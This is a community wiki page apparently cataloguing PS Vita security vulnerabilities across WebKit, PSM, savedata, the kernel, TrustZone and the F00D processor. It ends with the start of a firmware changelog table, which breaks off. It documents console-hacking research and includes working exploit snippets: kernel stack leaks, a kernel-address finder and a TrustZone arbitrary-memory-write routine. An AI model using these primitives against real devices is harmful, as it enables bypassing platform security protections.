The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When calling syscall, calling with invalid syscall id will end the svc interrupt without clearing vaddr in r0's syscall table.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not patched yet (not sure).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11407System Software2019-08-27T11:19:40Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
